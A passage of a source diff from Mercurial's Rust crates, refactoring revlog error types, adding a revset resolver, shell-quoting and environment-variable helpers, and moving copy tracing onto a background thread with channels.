- .try_into() - .unwrap(); - Ok(u64::from_be_bytes(array)) -} - fn rawdata_path(docket_path: &Path, uid: &str) -> PathBuf { let docket_name = docket_path .file_name() diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -11,22 +11,39 @@ use zstd; use super::index::Index; -use super::node::{NodePrefixRef, NODE_BYTES_LENGTH, NULL_NODE}; +use super::node::{NodePrefix, NODE_BYTES_LENGTH, NULL_NODE}; use super::nodemap; -use super::nodemap::NodeMap; +use super::nodemap::{NodeMap, NodeMapError}; use super::nodemap_docket::NodeMapDocket; use super::patch; +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::Revision; +#[derive(derive_more::From)] pub enum RevlogError { - IoError(std::io::Error), - UnsuportedVersion(u16), InvalidRevision, + /// Working directory is not supported + WDirUnsupported, /// Found more than one entry whose ID match the requested prefix AmbiguousPrefix, - Corrupted, - UnknowDataFormat(u8), + #[from] + Other(HgError), +} + +impl From<NodeMapError> for RevlogError { + fn from(error: NodeMapError) -> Self { + match error { + NodeMapError::MultipleResults => RevlogError::AmbiguousPrefix, + NodeMapError::RevisionNotInIndex(_) => RevlogError::corrupted(), + } + } +} + +impl RevlogError { + fn corrupted() -> Self { + RevlogError::Other(HgError::corrupted("corrupted revlog")) + } } /// Read only implementation of revlog. @@ -34,7 +51,7 @@ /// When index and data are not interleaved: bytes of the revlog index. /// When index and data are interleaved: bytes of the revlog index and /// data. 
- index: Index, + pub(crate) index: Index, /// When index and data are not interleaved: bytes of the revlog data data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>, /// When present on disk: the persistent nodemap for this revlog @@ -53,14 +70,12 @@ data_path: Option<&Path>, ) -> Result<Self, RevlogError> { let index_path = index_path.as_ref(); - let index_mmap = repo - .store_vfs() - .mmap_open(&index_path) - .map_err(RevlogError::IoError)?; + let index_mmap = repo.store_vfs().mmap_open(&index_path)?; let version = get_version(&index_mmap); if version != 1 { - return Err(RevlogError::UnsuportedVersion(version)); + // A proper new version should have had a repo/store requirement. + return Err(RevlogError::corrupted()); } let index = Index::new(Box::new(index_mmap))?; @@ -74,10 +89,7 @@ None } else { let data_path = data_path.unwrap_or(&default_data_path); - let data_mmap = repo - .store_vfs() - .mmap_open(data_path) - .map_err(RevlogError::IoError)?; + let data_mmap = repo.store_vfs().mmap_open(data_path)?; Some(Box::new(data_mmap)) }; @@ -111,13 +123,11 @@ #[timed] pub fn get_node_rev( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<Revision, RevlogError> { if let Some(nodemap) = &self.nodemap { return nodemap - .find_bin(&self.index, node) - // TODO: propagate details of this error: - .map_err(|_| RevlogError::Corrupted)? + .find_bin(&self.index, node)? .ok_or(RevlogError::InvalidRevision); } @@ -130,7 +140,9 @@ let mut found_by_prefix = None; for rev in (0..self.len() as Revision).rev() { let index_entry = - self.index.get_entry(rev).ok_or(RevlogError::Corrupted)?; + self.index.get_entry(rev).ok_or(HgError::corrupted( + "revlog references a revision not in the index", + ))?; if node == *index_entry.hash() { return Ok(rev); } @@ -144,6 +156,11 @@ found_by_prefix.ok_or(RevlogError::InvalidRevision) } + /// Returns whether the given revision exists in this revlog. 
+ pub fn has_rev(&self, rev: Revision) -> bool { + self.index.get_entry(rev).is_some() + } + /// Return the full data associated to a revision. /// /// All entries required to build the final data out of deltas will be @@ -156,8 +173,9 @@ let mut delta_chain = vec![]; while let Some(base_rev) = entry.base_rev { delta_chain.push(entry); - entry = - self.get_entry(base_rev).or(Err(RevlogError::Corrupted))?; + entry = self + .get_entry(base_rev) + .map_err(|_| RevlogError::corrupted())?; } // TODO do not look twice in the index @@ -180,7 +198,7 @@ ) { Ok(data) } else { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } } @@ -290,7 +308,8 @@ b'x' => Ok(Cow::Owned(self.uncompressed_zlib_data()?)), // zstd data. b'\x28' => Ok(Cow::Owned(self.uncompressed_zstd_data()?)), - format_type => Err(RevlogError::UnknowDataFormat(format_type)), + // A proper new format should have had a repo/store requirement. + _format_type => Err(RevlogError::corrupted()), } } @@ -300,13 +319,13 @@ let mut buf = Vec::with_capacity(self.compressed_len); decoder .read_to_end(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; decoder .read_exact(&mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } } @@ -315,14 +334,14 @@ if self.is_delta() { let mut buf = Vec::with_capacity(self.compressed_len); zstd::stream::copy_decode(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; Ok(buf) } else { let mut buf = vec![0; self.uncompressed_len]; let len = zstd::block::decompress_to_buffer(self.bytes, &mut buf) - .or(Err(RevlogError::Corrupted))?; + .map_err(|_| RevlogError::corrupted())?; if len != self.uncompressed_len { - Err(RevlogError::Corrupted) + Err(RevlogError::corrupted()) } else { Ok(buf) } diff --git a/rust/hg-core/src/revset.rs b/rust/hg-core/src/revset.rs new file mode 100644 --- 
/dev/null +++ b/rust/hg-core/src/revset.rs @@ -0,0 +1,62 @@ +//! The revset query language +//! +//! <https://www.mercurial-scm.org/repo/hg/help/revsets> + +use crate::errors::HgError; +use crate::repo::Repo; +use crate::revlog::changelog::Changelog; +use crate::revlog::revlog::{Revlog, RevlogError}; +use crate::revlog::NodePrefix; +use crate::revlog::{Revision, NULL_REVISION, WORKING_DIRECTORY_HEX}; +use crate::Node; + +/// Resolve a query string into a single revision. +/// +/// Only some of the revset language is implemented yet. +pub fn resolve_single( + input: &str, + repo: &Repo, +) -> Result<Revision, RevlogError> { + let changelog = Changelog::open(repo)?; + + match resolve_rev_number_or_hex_prefix(input, &changelog.revlog) { + Err(RevlogError::InvalidRevision) => {} // Try other syntax + result => return result, + } + + if input == "null" { + return Ok(NULL_REVISION); + } + + // TODO: support for the rest of the language here. + + Err( + HgError::unsupported(format!("cannot parse revset '{}'", input)) + .into(), + ) +} + +/// Resolve the small subset of the language suitable for revlogs other than +/// the changelog, such as in `hg debugdata --manifest` CLI argument. +/// +/// * A non-negative decimal integer for a revision number, or +/// * An hexadecimal string, for the unique node ID that starts with this +/// prefix +pub fn resolve_rev_number_or_hex_prefix( + input: &str, + revlog: &Revlog, +) -> Result<Revision, RevlogError> { + if let Ok(integer) = input.parse::<i32>() { + if integer >= 0 && revlog.has_rev(integer) { + return Ok(integer); + } + } + if let Ok(prefix) = NodePrefix::from_hex(input) { + if prefix.is_prefix_of(&Node::from_hex(WORKING_DIRECTORY_HEX).unwrap()) + { + return Err(RevlogError::WDirUnsupported); + } + return revlog.get_node_rev(prefix); + } + Err(RevlogError::InvalidRevision) +} diff --git a/rust/hg-core/src/utils.rs b/rust/hg-core/src/utils.rs --- a/rust/hg-core/src/utils.rs +++ b/rust/hg-core/src/utils.rs @@ -7,7 +7,12 @@ //! 
Contains useful functions, traits, structs, etc. for use in core. +use crate::errors::{HgError, IoErrorContext}; use crate::utils::hg_path::HgPath; +use im_rc::ordmap::DiffItem; +use im_rc::ordmap::OrdMap; +use std::cell::Cell; +use std::fmt; use std::{io::Write, ops::Deref}; pub mod files; @@ -62,10 +67,12 @@ } pub trait SliceExt { + fn trim_end_newlines(&self) -> &Self; fn trim_end(&self) -> &Self; fn trim_start(&self) -> &Self; fn trim(&self) -> &Self; fn drop_prefix(&self, needle: &Self) -> Option<&Self>; + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])>; } #[allow(clippy::trivially_copy_pass_by_ref)] @@ -74,6 +81,13 @@ } impl SliceExt for [u8] { + fn trim_end_newlines(&self) -> &[u8] { + if let Some(last) = self.iter().rposition(|&byte| byte != b'\n') { + &self[..=last] + } else { + &[] + } + } fn trim_end(&self) -> &[u8] { if let Some(last) = self.iter().rposition(is_not_whitespace) { &self[..=last] @@ -115,6 +129,13 @@ None } } + + fn split_2(&self, separator: u8) -> Option<(&[u8], &[u8])> { + let mut iter = self.splitn(2, |&byte| byte == separator); + let a = iter.next()?; + let b = iter.next()?; + Some((a, b)) + } } pub trait Escaped { @@ -176,3 +197,287 @@ None } } + +#[cfg(unix)] +pub fn shell_quote(value: &[u8]) -> Vec<u8> { + // TODO: Use the `matches!` macro when we require Rust 1.42+ + if value.iter().all(|&byte| match byte { + b'a'..=b'z' + | b'A'..=b'Z' + | b'0'..=b'9' + | b'.' 
+ | b'_' + | b'/' + | b'+' + | b'-' => true, + _ => false, + }) { + value.to_owned() + } else { + let mut quoted = Vec::with_capacity(value.len() + 2); + quoted.push(b'\''); + for &byte in value { + if byte == b'\'' { + quoted.push(b'\\'); + } + quoted.push(byte); + } + quoted.push(b'\''); + quoted + } +} + +pub fn current_dir() -> Result<std::path::PathBuf, HgError> { + std::env::current_dir().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentDir, + }) +} + +pub fn current_exe() -> Result<std::path::PathBuf, HgError> { + std::env::current_exe().map_err(|error| HgError::IoError { + error, + context: IoErrorContext::CurrentExe, + }) +} + +/// Expand `$FOO` and `${FOO}` environment variables in the given byte string +pub fn expand_vars(s: &[u8]) -> std::borrow::Cow<[u8]> { + lazy_static::lazy_static! { + /// https://github.com/python/cpython/blob/3.9/Lib/posixpath.py#L301 + /// The `x` makes whitespace ignored. + /// `-u` disables the Unicode flag, which makes `\w` like Python with the ASCII flag. + static ref VAR_RE: regex::bytes::Regex = + regex::bytes::Regex::new(r"(?x-u) + \$ + (?: + (\w+) + | + \{ + ([^}]*) + \} + ) + ").unwrap(); + } + VAR_RE.replace_all(s, |captures: ®ex::bytes::Captures| { + let var_name = files::get_os_str_from_bytes( + captures + .get(1) + .or_else(|| captures.get(2)) + .expect("either side of `|` must participate in match") + .as_bytes(), + ); + std::env::var_os(var_name) + .map(files::get_bytes_from_os_str) + .unwrap_or_else(|| { + // Referencing an environment variable that does not exist. + // Leave the $FOO reference as-is. + captures[0].to_owned() + }) + }) +} + +#[test] +fn test_expand_vars() { + // Modifying process-global state in a test isn’t great, + // but hopefully this won’t collide with anything. + std::env::set_var("TEST_EXPAND_VAR", "1"); + assert_eq!( + expand_vars(b"before/$TEST_EXPAND_VAR/after"), + &b"before/1/after"[..] 
+ ); + assert_eq!( + expand_vars(b"before${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}${TEST_EXPAND_VAR}after"), + &b"before111after"[..] + ); + let s = b"before $SOME_LONG_NAME_THAT_WE_ASSUME_IS_NOT_AN_ACTUAL_ENV_VAR after"; + assert_eq!(expand_vars(s), &s[..]); +} + +pub(crate) enum MergeResult<V> { + UseLeftValue, + UseRightValue, + UseNewValue(V), +} + +/// Return the union of the two given maps, +/// calling `merge(key, left_value, right_value)` to resolve keys that exist in +/// both. +/// +/// CC https://github.com/bodil/im-rs/issues/166 +pub(crate) fn ordmap_union_with_merge<K, V>( + left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + if left.ptr_eq(&right) { + // One of the two maps is an unmodified clone of the other + left + } else if left.len() / 2 > right.len() { + // When two maps have different sizes, + // their size difference is a lower bound on + // how many keys of the larger map are not also in the smaller map. + // This in turn is a lower bound on the number of differences in + // `OrdMap::diff` and the "amount of work" that would be done + // by `ordmap_union_with_merge_by_diff`. + // + // Here `left` is more than twice the size of `right`, + // so the number of differences is more than the total size of + // `right`. Therefore an algorithm based on iterating `right` + // is more efficient. + // + // This helps a lot when a tiny (or empty) map is merged + // with a large one. 
+ ordmap_union_with_merge_by_iter(left, right, merge) + } else if left.len() < right.len() / 2 { + // Same as above but with `left` and `right` swapped + ordmap_union_with_merge_by_iter(right, left, |key, a, b| { + // Also swapped in `merge` arguments: + match merge(key, b, a) { + MergeResult::UseNewValue(v) => MergeResult::UseNewValue(v), + // … and swap back in `merge` result: + MergeResult::UseLeftValue => MergeResult::UseRightValue, + MergeResult::UseRightValue => MergeResult::UseLeftValue, + } + }) + } else { + // For maps of similar size, use the algorithm based on `OrdMap::diff` + ordmap_union_with_merge_by_diff(left, right, merge) + } +} + +/// Efficient if `right` is much smaller than `left` +fn ordmap_union_with_merge_by_iter<K, V>( + mut left: OrdMap<K, V>, + right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone, +{ + for (key, right_value) in right { + match left.get(&key) { + None => { + left.insert(key, right_value); + } + Some(left_value) => match merge(&key, left_value, &right_value) { + MergeResult::UseLeftValue => {} + MergeResult::UseRightValue => { + left.insert(key, right_value); + } + MergeResult::UseNewValue(new_value) => { + left.insert(key, new_value); + } + }, + } + } + left +} + +/// Fallback when both maps are of similar size +fn ordmap_union_with_merge_by_diff<K, V>( + mut left: OrdMap<K, V>, + mut right: OrdMap<K, V>, + mut merge: impl FnMut(&K, &V, &V) -> MergeResult<V>, +) -> OrdMap<K, V> +where + K: Clone + Ord, + V: Clone + PartialEq, +{ + // (key, value) pairs that would need to be inserted in either map + // in order to turn it into the union. + // + // TODO: if/when https://github.com/bodil/im-rs/pull/168 is accepted, + // change these from `Vec<(K, V)>` to `Vec<(&K, Cow<V>)>` + // with `left_updates` only borrowing from `right` and `right_updates` from + // `left`, and with `Cow::Owned` used for `MergeResult::UseNewValue`. 
+ // + // This would allow moving all `.clone()` calls to after we’ve decided + // which of `right_updates` or `left_updates` to use + // (value ones becoming `Cow::into_owned`), + // and avoid making clones we don’t end up using. + let mut left_updates = Vec::new(); + let mut right_updates = Vec::new(); + + for difference in left.diff(&right) { + match difference { + DiffItem::Add(key, value) => { + left_updates.push((key.clone(), value.clone())) + } + DiffItem::Remove(key, value) => { + right_updates.push((key.clone(), value.clone())) + } + DiffItem::Update { + old: (key, left_value), + new: (_, right_value), + } => match merge(key, left_value, right_value) { + MergeResult::UseLeftValue => { + right_updates.push((key.clone(), left_value.clone())) + } + MergeResult::UseRightValue => { + left_updates.push((key.clone(), right_value.clone())) + } + MergeResult::UseNewValue(new_value) => { + left_updates.push((key.clone(), new_value.clone())); + right_updates.push((key.clone(), new_value)) + } + }, + } + } + if left_updates.len() < right_updates.len() { + for (key, value) in left_updates { + left.insert(key, value); + } + left + } else { + for (key, value) in right_updates { + right.insert(key, value); + } + right + } +} + +/// Join items of the iterable with the given separator, similar to Python’s +/// `separator.join(iter)`. +/// +/// Formatting the return value consumes the iterator. +/// Formatting it again will produce an empty string. 
+pub fn join_display( + iter: impl IntoIterator<Item = impl fmt::Display>, + separator: impl fmt::Display, +) -> impl fmt::Display { + JoinDisplay { + iter: Cell::new(Some(iter.into_iter())), + separator, + } +} + +struct JoinDisplay<I, S> { + iter: Cell<Option<I>>, + separator: S, +} + +impl<I, T, S> fmt::Display for JoinDisplay<I, S> +where + I: Iterator<Item = T>, + T: fmt::Display, + S: fmt::Display, +{ + fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { + if let Some(mut iter) = self.iter.take() { + if let Some(first) = iter.next() { + first.fmt(f)?; + } + for value in iter { + self.separator.fmt(f)?; + value.fmt(f)?; + } + } + Ok(()) + } +} diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -17,13 +17,13 @@ use lazy_static::lazy_static; use same_file::is_same_file; use std::borrow::{Cow, ToOwned}; +use std::ffi::OsStr; use std::fs::Metadata; -use std::io::Read; use std::iter::FusedIterator; use std::ops::Deref; use std::path::{Path, PathBuf}; -pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { +pub fn get_os_str_from_bytes(bytes: &[u8]) -> &OsStr { let os_str; #[cfg(unix)] { @@ -33,16 +33,24 @@ // TODO Handle other platforms // TODO: convert from WTF8 to Windows MBCS (ANSI encoding). // Perhaps, the return type would have to be Result<PathBuf>. + os_str +} - Path::new(os_str) +pub fn get_path_from_bytes(bytes: &[u8]) -> &Path { + Path::new(get_os_str_from_bytes(bytes)) } // TODO: need to convert from WTF8 to MBCS bytes on Windows. // that's why Vec<u8> is returned. 
#[cfg(unix)] pub fn get_bytes_from_path(path: impl AsRef<Path>) -> Vec<u8> { + get_bytes_from_os_str(path.as_ref()) +} + +#[cfg(unix)] +pub fn get_bytes_from_os_str(str: impl AsRef<OsStr>) -> Vec<u8> { use std::os::unix::ffi::OsStrExt; - path.as_ref().as_os_str().as_bytes().to_vec() + str.as_ref().as_bytes().to_vec() } /// An iterator over repository path yielding itself and its ancestors. @@ -191,6 +199,12 @@ st_ctime: metadata.ctime(), } } + + pub fn is_symlink(&self) -> bool { + // This is way too manual, but `HgMetadata` will go away in the + // near-future dirstate rewrite anyway. + self.st_mode & 0170000 == 0120000 + } } /// Returns the canonical path of `name`, given `cwd` and `root` @@ -276,7 +290,13 @@ if cwd.as_ref().is_empty() { Cow::Borrowed(path.as_bytes()) } else { - let mut res: Vec<u8> = Vec::new(); + // This is not all accurate as to how large `res` will actually be, but + // profiling `rhg files` on a large-ish repo shows it’s better than + // starting from a zero-capacity `Vec` and letting `extend` reallocate + // repeatedly. 
+ let guesstimate = path.as_bytes().len(); + + let mut res: Vec<u8> = Vec::with_capacity(guesstimate); let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable(); let mut cwd_iter = cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable(); @@ -309,17 +329,6 @@ } } -/// Reads a file in one big chunk instead of doing multiple reads -pub fn read_whole_file(filepath: &Path) -> std::io::Result<Vec<u8>> { - let mut file = std::fs::File::open(filepath)?; - let size = file.metadata()?.len(); - - let mut res = vec![0; size as usize]; - file.read_exact(&mut res)?; - - Ok(res) -} - #[cfg(test)] mod tests { use super::*; diff --git a/rust/hg-core/src/utils/hg_path.rs b/rust/hg-core/src/utils/hg_path.rs --- a/rust/hg-core/src/utils/hg_path.rs +++ b/rust/hg-core/src/utils/hg_path.rs @@ -47,57 +47,68 @@ }, } -impl ToString for HgPathError { - fn to_string(&self) -> String { +impl fmt::Display for HgPathError { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match self { HgPathError::LeadingSlash(bytes) => { - format!("Invalid HgPath '{:?}': has a leading slash.", bytes) + write!(f, "Invalid HgPath '{:?}': has a leading slash.", bytes) } HgPathError::ConsecutiveSlashes { bytes, second_slash_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': consecutive slashes at pos {}.", bytes, pos ), HgPathError::ContainsNullByte { bytes, null_byte_index: pos, - } => format!( + } => write!( + f, "Invalid HgPath '{:?}': contains null byte at pos {}.", bytes, pos ), - HgPathError::DecodeError(bytes) => { - format!("Invalid HgPath '{:?}': could not be decoded.", bytes) - } + HgPathError::DecodeError(bytes) => write!( + f, + "Invalid HgPath '{:?}': could not be decoded.", + bytes + ), HgPathError::EndsWithSlash(path) => { - format!("Audit failed for '{}': ends with a slash.", path) + write!(f, "Audit failed for '{}': ends with a slash.", path) } - HgPathError::ContainsIllegalComponent(path) => format!( + HgPathError::ContainsIllegalComponent(path) => write!( 
+ f, "Audit failed for '{}': contains an illegal component.", path ), - HgPathError::InsideDotHg(path) => format!( + HgPathError::InsideDotHg(path) => write!( + f, "Audit failed for '{}': is inside the '.hg' folder.", path ), HgPathError::IsInsideNestedRepo { path, nested_repo: nested, - } => format!( + } => { + write!(f, "Audit failed for '{}': is inside a nested repository '{}'.", path, nested - ), - HgPathError::TraversesSymbolicLink { path, symlink } => format!( + ) + } + HgPathError::TraversesSymbolicLink { path, symlink } => write!( + f, "Audit failed for '{}': traverses symbolic link '{}'.", path, symlink ), - HgPathError::NotFsCompliant(path) => format!( + HgPathError::NotFsCompliant(path) => write!( + f, "Audit failed for '{}': cannot be turned into a \ filesystem path.", path ), - HgPathError::NotUnderRoot { path, root } => format!( + HgPathError::NotUnderRoot { path, root } => write!( + f, "Audit failed for '{}': not under root {}.", path.display(), root.display() @@ -367,7 +378,9 @@ } } -#[derive(Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash)] +#[derive( + Default, Eq, Ord, Clone, PartialEq, PartialOrd, Hash, derive_more::From, +)] pub struct HgPathBuf { inner: Vec<u8>, } @@ -408,12 +421,6 @@ } } -impl From<Vec<u8>> for HgPathBuf { - fn from(vec: Vec<u8>) -> Self { - Self { inner: vec } - } -} - impl<T: ?Sized + AsRef<HgPath>> From<&T> for HgPathBuf { fn from(s: &T) -> HgPathBuf { s.as_ref().to_owned() diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ b/rust/hg-cpython/Cargo.toml @@ -10,7 +10,6 @@ [features] default = ["python27"] -dirstate-tree = ["hg-core/dirstate-tree"] # Features to build an extension module: python27 = ["cpython/python27-sys", "cpython/extension-module-2-7"] @@ -22,11 +21,12 @@ python3-bin = ["cpython/python3-sys"] [dependencies] +crossbeam-channel = "0.4" hg-core = { path = "../hg-core"} libc = '*' log = "0.4.8" env_logger = "0.7.1" [dependencies.cpython] -version = 
"0.4.1" +version = "0.5.2" default-features = false diff --git a/rust/hg-cpython/src/copy_tracing.rs b/rust/hg-cpython/src/copy_tracing.rs --- a/rust/hg-cpython/src/copy_tracing.rs +++ b/rust/hg-cpython/src/copy_tracing.rs @@ -1,7 +1,7 @@ use cpython::ObjectProtocol; -use cpython::PyBool; use cpython::PyBytes; use cpython::PyDict; +use cpython::PyDrop; use cpython::PyList; use cpython::PyModule; use cpython::PyObject; @@ -9,13 +9,63 @@ use cpython::PyTuple; use cpython::Python; -use hg::copy_tracing::combine_changeset_copies; use hg::copy_tracing::ChangedFiles; -use hg::copy_tracing::DataHolder; -use hg::copy_tracing::RevInfo; -use hg::copy_tracing::RevInfoMaker; +use hg::copy_tracing::CombineChangesetCopies; use hg::Revision; +use self::pybytes_with_data::PyBytesWithData; + +// Module to encapsulate private fields +mod pybytes_with_data { + use cpython::{PyBytes, Python}; + + /// Safe abstraction over a `PyBytes` together with the `&[u8]` slice + /// that borrows it. + /// + /// Calling `PyBytes::data` requires a GIL marker but we want to access the + /// data in a thread that (ideally) does not need to acquire the GIL. + /// This type allows separating the call and the use. + pub(super) struct PyBytesWithData { + #[allow(unused)] + keep_alive: PyBytes, + + /// Borrows the buffer inside `self.keep_alive`, + /// but the borrow-checker cannot express self-referential structs. + data: *const [u8], + } + + fn require_send<T: Send>() {} + + #[allow(unused)] + fn static_assert_pybytes_is_send() { + require_send::<PyBytes>; + } + + // Safety: PyBytes is Send. Raw pointers are not by default, + // but here sending one to another thread is fine since we ensure it stays + // valid.
+ unsafe impl Send for PyBytesWithData {} + + impl PyBytesWithData { + pub fn new(py: Python, bytes: PyBytes) -> Self { + Self { + data: bytes.data(py), + keep_alive: bytes, + } + } + + pub fn data(&self) -> &[u8] { + // Safety: the raw pointer is valid as long as the PyBytes is still + // alive, and the returned slice borrows `self`. + unsafe { &*self.data } + } + + pub fn unwrap(self) -> PyBytes { + self.keep_alive + } + } +} + /// Combines copies information contained into revision `revs` to build a copy /// map. /// @@ -26,88 +76,135 @@ children_count: PyDict, target_rev: Revision, rev_info: PyObject, - is_ancestor: PyObject, + multi_thread: bool, ) -> PyResult<PyDict> { - let revs: PyResult<_> = - revs.iter(py).map(|r| Ok(r.extract(py)?)).collect(); - - // Wrap the `is_ancestor` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. - let is_ancestor_wrap = |anc: Revision, desc: Revision| -> bool { - is_ancestor - .call(py, (anc, desc), None) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - failed", - ) - .cast_into::<PyBool>(py) - .expect( - "rust-copy-tracing: python call to `is_ancestor` \ - returned unexpected non-Bool value", - ) - .is_true() - }; - - // Wrap the `rev_info_maker` python callback as a Rust closure - // - // No errors are expected from the Python side, and they will should only - // happens in case of programing error or severe data corruption. Such - // errors will raise panic and the rust-cpython harness will turn them into - // Python exception. 
- let rev_info_maker: RevInfoMaker<PyBytes> = - Box::new(|rev: Revision, d: &mut DataHolder<PyBytes>| -> RevInfo { - let res: PyTuple = rev_info - .call(py, (rev,), None) - .expect("rust-copy-tracing: python call to `rev_info` failed") - .cast_into(py) - .expect( - "rust-copy_tracing: python call to `rev_info` returned \ - unexpected non-Tuple value", - ); - let p1 = res.get_item(py, 0).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - let p2 = res.get_item(py, 1).extract(py).expect( - "rust-copy-tracing: rev_info return is invalid, first item \ - is a not a revision", - ); - - let files = match res.get_item(py, 2).extract::<PyBytes>(py) { - Ok(raw) => { - // Give responsability for the raw bytes lifetime to - // hg-core - d.data = Some(raw); - let addrs = d.data.as_ref().expect( - "rust-copy-tracing: failed to get a reference to the \ - raw bytes for copy data").data(py); - ChangedFiles::new(addrs) - } - // value was presumably None, meaning they was no copy data. 
- Err(_) => ChangedFiles::new_empty(), - }; - - (p1, p2, files) - }); - let children_count: PyResult<_> = children_count + let children_count = children_count .items(py) .iter() .map(|(k, v)| Ok((k.extract(py)?, v.extract(py)?))) - .collect(); + .collect::<PyResult<_>>()?; + + /// (Revision number, parent 1, parent 2, copy data for this revision) + type RevInfo<Bytes> = (Revision, Revision, Revision, Option<Bytes>); + + let revs_info = + revs.iter(py).map(|rev_py| -> PyResult<RevInfo<PyBytes>> { + let rev = rev_py.extract(py)?; + let tuple: PyTuple = + rev_info.call(py, (rev_py,), None)?.cast_into(py)?; + let p1 = tuple.get_item(py, 0).extract(py)?; + let p2 = tuple.get_item(py, 1).extract(py)?; + let opt_bytes = tuple.get_item(py, 2).extract(py)?; + Ok((rev, p1, p2, opt_bytes)) + }); + + let path_copies; + if !multi_thread { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let files = match &opt_bytes { + Some(bytes) => ChangedFiles::new(bytes.data(py)), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + + combine_changeset_copies.add_revision(rev, p1, p2, files) + } + path_copies = combine_changeset_copies.finish(target_rev) + } else { + // Use a bounded channel to provide back-pressure: + // if the child thread is slower to process revisions than this thread + // is to gather data for them, an unbounded channel would keep + // growing and eat memory. + // + // TODO: tweak the bound? + let (rev_info_sender, rev_info_receiver) = + crossbeam_channel::bounded::<RevInfo<PyBytesWithData>>(1000); + + // This channel (going the other way around) however is unbounded. + // If they were both bounded, there might potentially be deadlocks + // where both channels are full and both threads are waiting on each + // other. 
+ let (pybytes_sender, pybytes_receiver) = + crossbeam_channel::unbounded(); - let res = combine_changeset_copies( - revs?, - children_count?, - target_rev, - rev_info_maker, - &is_ancestor_wrap, - ); + // Start a thread that does CPU-heavy processing in parallel with the + // loop below. + // + // If the parent thread panics, `rev_info_sender` will be dropped and + // “disconnected”. `rev_info_receiver` will be notified of this and + // exit its own loop. + let thread = std::thread::spawn(move || { + let mut combine_changeset_copies = + CombineChangesetCopies::new(children_count); + for (rev, p1, p2, opt_bytes) in rev_info_receiver { + let files = match &opt_bytes { + Some(raw) => ChangedFiles::new(raw.data()), + // Python None was extracted to Option::None, + // meaning there was no copy data. + None => ChangedFiles::new_empty(), + }; + combine_changeset_copies.add_revision(rev, p1, p2, files); + + // Send `PyBytes` back to the parent thread so the parent + // thread can drop it. Otherwise the GIL would be implicitly + // acquired here through `impl Drop for PyBytes`. + if let Some(bytes) = opt_bytes { + if let Err(_) = pybytes_sender.send(bytes.unwrap()) { + // The channel is disconnected, meaning the parent + // thread panicked or returned + // early through + // `?` to propagate a Python exception. 
+ break; + } + } + } + + combine_changeset_copies.finish(target_rev) + }); + + for rev_info in revs_info { + let (rev, p1, p2, opt_bytes) = rev_info?; + let opt_bytes = opt_bytes.map(|b| PyBytesWithData::new(py, b)); + + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + py.allow_threads(|| { + rev_info_sender.send((rev, p1, p2, opt_bytes)).expect( + "combine_changeset_copies: channel is disconnected", + ); + }); + + // Drop anything in the channel, without blocking + for pybytes in pybytes_receiver.try_iter() { + pybytes.release_ref(py) + } + } + // We’d prefer to avoid the child thread calling into Python code, + // but this avoids a potential deadlock on the GIL if it does: + path_copies = py.allow_threads(|| { + // Disconnect the channel to signal the child thread to stop: + // the `for … in rev_info_receiver` loop will end. + drop(rev_info_sender); + + // Wait for the child thread to stop, and propagate any panic. 
